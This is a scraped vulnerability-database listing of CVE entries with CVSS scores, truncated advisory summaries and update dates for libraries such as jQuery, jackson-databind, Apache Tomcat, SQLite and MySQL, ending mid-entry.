Max CVSS 9.3 Min CVSS 1.2 Total Count2
IDCVSSSummaryLast (major) updatePublished
CVE-2019-11358 4.3
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the n
16-02-2024 - 16:32 20-04-2019 - 00:29
CVE-2019-10744 6.4
Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.
21-01-2024 - 02:45 26-07-2019 - 00:15
CVE-2019-17566 5.0
Apache Batik is vulnerable to server-side request forgery, caused by improper input validation by the "xlink:href" attributes. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make
07-01-2024 - 11:15 12-11-2020 - 18:15
CVE-2019-3773 7.5
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources.
27-12-2023 - 15:15 18-01-2019 - 22:29
CVE-2019-13990 7.5
initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.
22-12-2023 - 16:35 26-07-2019 - 19:15
CVE-2020-11080 5.0
In nghttp2 before version 1.41.0, the overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings e
16-10-2023 - 18:15 03-06-2020 - 23:15
CVE-2012-2098 5.0
Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with ma
14-09-2023 - 00:15 29-06-2012 - 19:55
CVE-2020-9548 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
13-09-2023 - 14:57 02-03-2020 - 04:15
CVE-2020-9547 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
13-09-2023 - 14:57 02-03-2020 - 04:15
CVE-2020-24616 6.8
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).
13-09-2023 - 14:56 25-08-2020 - 18:15
CVE-2020-10673 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).
13-09-2023 - 14:56 18-03-2020 - 22:15
CVE-2020-24750 6.8
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
13-09-2023 - 14:56 17-09-2020 - 19:15
CVE-2020-11023 4.3
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may ex
31-08-2023 - 03:15 29-04-2020 - 21:15
CVE-2020-11022 4.3
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This prob
31-08-2023 - 03:15 29-04-2020 - 22:15
CVE-2019-12402 5.0
The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names insi
18-08-2023 - 14:15 30-08-2019 - 09:15
CVE-2019-20907 5.0
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
24-05-2023 - 21:15 13-07-2020 - 13:15
CVE-2020-14422 4.3
Lib/ipaddress.py in Python through 3.8.3 improperly computes hash values in the IPv4Interface and IPv6Interface classes, which might allow a remote attacker to cause a denial of service if an application is affected by the performance of a dictionary
16-05-2023 - 02:15 18-06-2020 - 14:15
CVE-2020-17521 2.1
Apache Groovy provides extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operatin
14-04-2023 - 18:32 07-12-2020 - 20:15
CVE-2020-5421 3.6
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jses
01-03-2023 - 18:56 19-09-2020 - 04:15
CVE-2015-4000 4.3
The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a Clie
09-02-2023 - 16:15 21-05-2015 - 00:59
CVE-2020-8287 6.4
Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 allow two copies of a header field in an HTTP request (for example, two Transfer-Encoding header fields). In this case, Node.js identifies the first header field and ignores the second. This c
03-02-2023 - 19:12 06-01-2021 - 21:15
CVE-2021-2007 4.3
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with ne
08-12-2022 - 03:04 20-01-2021 - 15:15
CVE-2019-0230 7.5
Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
02-12-2022 - 19:47 14-09-2020 - 17:15
CVE-2020-1968 4.3
The Raccoon attack exploits a flaw in the TLS specification which can lead to an attacker being able to compute the pre-master secret in connections which have used a Diffie-Hellman (DH) based ciphersuite. In such a case this would result in the atta
21-11-2022 - 19:48 09-09-2020 - 14:15
CVE-2018-1285 7.5
Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.
27-10-2022 - 20:05 11-05-2020 - 17:15
CVE-2020-2555 7.5
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows una
25-10-2022 - 17:58 15-01-2020 - 17:15
CVE-2020-25866 5.0
In Wireshark 3.2.0 to 3.2.6 and 3.0.0 to 3.0.13, the BLIP protocol dissector has a NULL pointer dereference because a buffer was sized for compressed (not uncompressed) messages. This was addressed in epan/dissectors/packet-blip.c by allowing reasona
07-10-2022 - 15:19 06-10-2020 - 15:15
CVE-2019-11135 2.1
TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
07-10-2022 - 15:03 14-11-2019 - 19:15
CVE-2019-17359 5.0
The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64.
07-10-2022 - 14:50 08-10-2019 - 14:15
CVE-2019-17563 5.1
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be p
07-10-2022 - 13:39 23-12-2019 - 17:15
CVE-2020-24584 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). The intermediate-level directories of the filesystem cache had the system's standard umask rather than 0o077.
07-10-2022 - 13:20 01-09-2020 - 13:15
CVE-2020-24583 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). FILE_UPLOAD_DIRECTORY_PERMISSIONS mode was not applied to intermediate-level directories created in the process of uploading file
07-10-2022 - 13:14 01-09-2020 - 13:15
CVE-2020-9490 5.0
Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via
07-10-2022 - 12:58 07-08-2020 - 16:15
CVE-2020-11973 7.5
Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.
05-10-2022 - 20:53 14-05-2020 - 17:15
CVE-2019-10173 7.5
It was found that xstream API version 1.4.10 before 1.4.11 introduced a regression for a previous deserialization flaw. If the security framework has not been initialized, it may allow a remote attacker to run arbitrary shell commands when unmarshall
05-10-2022 - 20:38 23-07-2019 - 13:15
CVE-2020-9281 4.3
A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14 allows remote attackers to inject arbitrary web script through a crafted "protected" comment (with the cke_protected syntax).
12-09-2022 - 13:51 07-03-2020 - 01:15
CVE-2020-10725 4.0
A flaw was found in DPDK version 19.11 and above that allows a malicious guest to cause a segmentation fault of the vhost-user backend application running on the host, which could result in a loss of connectivity for the other guests running on that
02-09-2022 - 15:36 20-05-2020 - 14:15
CVE-2020-10723 4.6
A memory corruption issue was found in DPDK versions 17.05 and above. This flaw is caused by an integer truncation on the index of a payload. Under certain circumstances, the index (a UInt) is copied and truncated into a uint16, which can lead to out
02-09-2022 - 15:36 19-05-2020 - 19:15
CVE-2020-10722 4.6
A vulnerability was found in DPDK versions 18.05 and above. A missing check for an integer overflow in vhost_user_set_log_base() could result in a smaller memory map than requested, possibly allowing memory corruption.
02-09-2022 - 15:36 19-05-2020 - 19:15
CVE-2020-10726 2.1
A vulnerability was found in DPDK versions 19.11 and above. A malicious container that has direct access to the vhost-user socket can keep sending VHOST_USER_GET_INFLIGHT_FD messages, causing a resource leak (file descriptors and virtual memory), whi
02-09-2022 - 15:34 20-05-2020 - 14:15
CVE-2020-13254 4.3
An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage.
02-09-2022 - 15:33 03-06-2020 - 14:15
CVE-2019-20892 4.0
net-snmp before 5.8.1.pre1 has a double free in usm_free_usmStateReference in snmplib/snmpusm.c via an SNMPv3 GetBulk request. NOTE: this affects net-snmp packages shipped to end users by multiple Linux distributions, but might not affect an upstream
02-09-2022 - 15:31 25-06-2020 - 10:15
CVE-2020-17498 4.3
In Wireshark 3.2.0 to 3.2.5, the Kafka protocol dissector could crash. This was addressed in epan/dissectors/packet-kafka.c by avoiding a double free during LZ4 decompression.
02-09-2022 - 15:31 13-08-2020 - 16:15
CVE-2020-13596 4.3
An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. Query parameters generated by the Django admin ForeignKeyRawIdWidget were not properly URL encoded, leading to a possibility of an XSS attack.
02-09-2022 - 15:31 03-06-2020 - 14:15
CVE-2020-15025 4.0
ntpd in ntp 4.2.8 before 4.2.8p15 and 4.3.x before 4.3.101 allows remote attackers to cause a denial of service (memory consumption) by sending packets, because memory is not freed in situations where a CMAC key is used and associated with a CMAC alg
02-09-2022 - 15:31 24-06-2020 - 19:15
CVE-2019-17569 5.8
The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of H
02-09-2022 - 15:30 24-02-2020 - 22:15
CVE-2020-25020 7.5
MPXJ through 8.1.3 allows XXE attacks. This affects the GanttProjectReader and PhoenixReader components.
02-09-2022 - 15:29 29-08-2020 - 19:15
CVE-2021-2032 4.0
Vulnerability in the MySQL Server product of Oracle MySQL (component: Information Schema). Supported versions that are affected are 5.7.32 and prior and 8.0.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network ac
29-08-2022 - 20:52 20-01-2021 - 15:15
CVE-2020-1971 4.3
The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they
29-08-2022 - 20:27 08-12-2020 - 16:15
CVE-2020-7064 5.8
In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while parsing EXIF data with exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead
29-08-2022 - 20:04 01-04-2020 - 04:15
CVE-2019-1559 4.3
If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid
19-08-2022 - 11:14 27-02-2019 - 23:29
CVE-2018-0732 5.0
During key agreement in a TLS handshake using a DH(E) based ciphersuite a malicious server can send a very large prime value to the client. This will cause the client to spend an unreasonably long period of time generating a key for this prime result
16-08-2022 - 13:00 12-06-2018 - 13:29
CVE-2019-9511 7.8
Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. T
12-08-2022 - 18:43 13-08-2019 - 21:15
CVE-2019-9513 7.8
Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the
12-08-2022 - 18:41 13-08-2019 - 21:15
CVE-2020-10531 6.8
An issue was discovered in International Components for Unicode (ICU) for C/C++ through 66.1. An integer overflow, leading to a heap-based buffer overflow, exists in the UnicodeString::doAppend() function in common/unistr.cpp.
12-08-2022 - 18:28 12-03-2020 - 19:15
CVE-2020-35460 5.0
common/InputStreamHelper.java in Packwood MPXJ before 8.3.5 allows directory traversal in the zip stream handler flow, leading to the writing of files to arbitrary locations.
06-08-2022 - 03:53 14-12-2020 - 23:15
CVE-2018-8032 4.3
Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.
25-07-2022 - 18:15 02-08-2018 - 13:29
CVE-2020-5398 7.6
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response
25-07-2022 - 18:15 17-01-2020 - 00:15
CVE-2020-9484 4.4
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the Persiste
25-07-2022 - 18:15 20-05-2020 - 19:15
CVE-2019-10086 7.5
In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by defa
25-07-2022 - 18:15 20-08-2019 - 21:15
CVE-2020-10683 7.5
dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any a
25-07-2022 - 18:15 01-05-2020 - 19:15
CVE-2016-1000031 7.5
Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution
25-07-2022 - 18:15 25-10-2016 - 14:29
CVE-2019-0227 5.4
A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to buil
25-07-2022 - 18:15 01-05-2019 - 21:29
CVE-2015-8965 7.5
Rogue Wave JViews before 8.8 patch 21 and 8.9 before patch 1 allows remote attackers to execute arbitrary Java code that exists in the classpath, such as test code or administration code. The issue exists because the ilog.views.faces.IlvFacesControll
23-07-2022 - 10:33 06-04-2017 - 21:59
CVE-2021-2011 7.1
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via m
18-07-2022 - 18:47 20-01-2021 - 15:15
CVE-2021-2022 6.3
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.6.50 and prior, 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with n
13-07-2022 - 14:09 20-01-2021 - 15:15
CVE-2020-1938 7.5
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available t
12-07-2022 - 17:42 24-02-2020 - 22:15
CVE-2021-2119 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
30-06-2022 - 19:06 20-01-2021 - 15:15
CVE-2018-10237 4.3
Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray
29-06-2022 - 19:15 26-04-2018 - 21:29
CVE-2019-14862 4.3
There is a vulnerability in knockout before version 3.5.0-beta, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.
07-06-2022 - 18:41 02-01-2020 - 15:15
CVE-2019-12399 5.0
When Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring
07-06-2022 - 18:41 14-01-2020 - 15:15
CVE-2019-17195 6.8
Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.
07-06-2022 - 18:40 15-10-2019 - 14:15
CVE-2020-17530 7.5
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
03-06-2022 - 16:38 11-12-2020 - 02:15
CVE-2020-13871 5.0
SQLite 3.32.2 has a use-after-free in resetAccumulator in select.c because the parse tree rewrite for window functions is too late.
13-05-2022 - 20:57 06-06-2020 - 16:15
CVE-2018-15756 5.0
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler,
13-05-2022 - 20:56 18-10-2018 - 22:29
CVE-2020-8172 5.8
TLS session reuse can lead to host certificate verification bypass in node version < 12.18.0 and < 14.4.0.
12-05-2022 - 15:01 08-06-2020 - 14:15
CVE-2020-8174 9.3
napi_get_value_string_*() allows various kinds of memory corruption in node < 10.21.0, 12.18.0, and < 14.4.0.
12-05-2022 - 15:01 24-07-2020 - 22:15
CVE-2020-15358 2.1
In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation.
12-05-2022 - 15:01 27-06-2020 - 12:15
CVE-2020-13935 5.0
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with inv
12-05-2022 - 15:01 14-07-2020 - 15:15
CVE-2020-9488 4.3
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Lo
12-05-2022 - 15:00 27-04-2020 - 16:15
CVE-2020-12723 5.0
regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.
12-05-2022 - 15:00 05-06-2020 - 15:15
CVE-2020-11971 5.0
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
12-05-2022 - 15:00 14-05-2020 - 17:15
CVE-2020-10543 6.4
Perl before 5.30.3 on 32-bit platforms allows a heap-based buffer overflow because nested regular expression quantifiers have an integer overflow.
12-05-2022 - 15:00 05-06-2020 - 14:15
CVE-2020-10878 7.5
Perl before 5.30.3 has an integer overflow related to mishandling of a "PL_regkind[OP(n)] == NOTHING" situation. A crafted regular expression could lead to malformed bytecode with a possibility of instruction injection.
12-05-2022 - 15:00 05-06-2020 - 14:15
CVE-2020-13954 4.3
By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to
12-05-2022 - 14:47 12-11-2020 - 13:15
CVE-2020-11979 5.0
As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without
12-05-2022 - 14:43 01-10-2020 - 20:15
CVE-2020-8277 5.0
A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions < 15.2.1, < 14.15.1, and < 12.19.1 by getting the application to resolve a DNS record with a larger number
10-05-2022 - 15:25 19-11-2020 - 01:15
CVE-2020-11612 5.0
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free m
26-04-2022 - 17:05 07-04-2020 - 18:15
CVE-2019-10247 5.0
In Eclipse Jetty version 7.x, 8.x, 9.2.27 and older, 9.3.26 and older, and 9.4.16 and older, the server running on any OS and Jetty version combination will reveal the configured fully qualified directory base resource location on the output of the 4
22-04-2022 - 20:09 22-04-2019 - 20:29
CVE-2019-5427 5.0
c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.
22-04-2022 - 19:28 22-04-2019 - 21:29
CVE-2019-1551 5.0
There is an overflow bug in the x64_64 Montgomery squaring procedure used in exponentiation with 512-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against 2-prime RSA1024, 3-prime RSA1536, and DSA1024 as a result of this d
19-04-2022 - 15:36 06-12-2019 - 18:15
CVE-2019-0233 5.0
An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload.
18-04-2022 - 15:23 14-09-2020 - 17:15
CVE-2018-1258 6.5
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted
11-04-2022 - 17:18 11-05-2018 - 20:29
CVE-2019-12415 2.1
In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML E
08-04-2022 - 13:30 23-10-2019 - 20:15
CVE-2020-11656 7.5
In SQLite through 3.31.1, the ALTER TABLE implementation has a use-after-free, as demonstrated by an ORDER BY clause that belongs to a compound SELECT statement.
08-04-2022 - 10:34 09-04-2020 - 03:15
CVE-2020-11655 5.0
SQLite through 3.31.1 allows attackers to cause a denial of service (segmentation fault) via a malformed window-function query because the AggInfo object's initialization is mishandled.
08-04-2022 - 10:34 09-04-2020 - 03:15
CVE-2020-9327 5.0
In SQLite 3.31.1, isAuxiliaryVtabOperator allows attackers to trigger a NULL pointer dereference and segmentation fault because of generated column optimizations.
08-04-2022 - 10:33 21-02-2020 - 22:15
CVE-2019-17091 4.3
faces/context/PartialViewContextImpl.java in Eclipse Mojarra, as used in Mojarra for Eclipse EE4J before 2.3.10 and Mojarra JavaServer Faces before 2.2.20, allows Reflected XSS because a client window field is mishandled.
06-04-2022 - 18:00 02-10-2019 - 14:15
CVE-2020-8265 6.8
Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 are vulnerable to a use-after-free bug in its TLS implementation. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap
06-04-2022 - 16:26 06-01-2021 - 21:15
CVE-2017-5645 7.5
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
04-04-2022 - 16:53 17-04-2017 - 21:59
CVE-2020-1945 3.3
Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files fr
04-04-2022 - 13:31 14-05-2020 - 16:15
CVE-2020-11994 5.0
Server-Side Template Injection and arbitrary file disclosure on Camel templating components
01-04-2022 - 15:33 08-07-2020 - 16:15
CVE-2021-2010 4.9
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.50 and prior, 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with net
30-03-2022 - 19:22 20-01-2021 - 15:15
CVE-2021-2006 6.3
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 8.0.19 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to c
30-03-2022 - 19:20 20-01-2021 - 15:15
CVE-2021-1998 5.5
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
30-03-2022 - 19:18 20-01-2021 - 15:15
CVE-2020-14756 7.5
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unaut
29-03-2022 - 16:40 20-01-2021 - 15:15
CVE-2020-13934 5.0
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException co
01-03-2022 - 21:01 14-07-2020 - 15:15
CVE-2020-27216 4.4
In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2O, on Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can obser
01-03-2022 - 20:35 23-10-2020 - 13:15
CVE-2021-2001 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.50 and prior, 5.7.30 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attack
04-01-2022 - 17:45 20-01-2021 - 15:15
CVE-2021-2009 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multip
04-01-2022 - 17:45 20-01-2021 - 15:15
CVE-2021-2002 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple p
04-01-2022 - 17:45 20-01-2021 - 15:15
CVE-2021-2058 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple proto
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2042 2.1
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Se
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2056 6.3
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protoco
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2055 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2046 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multi
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2048 7.0
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2030 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2012 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via m
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2038 6.3
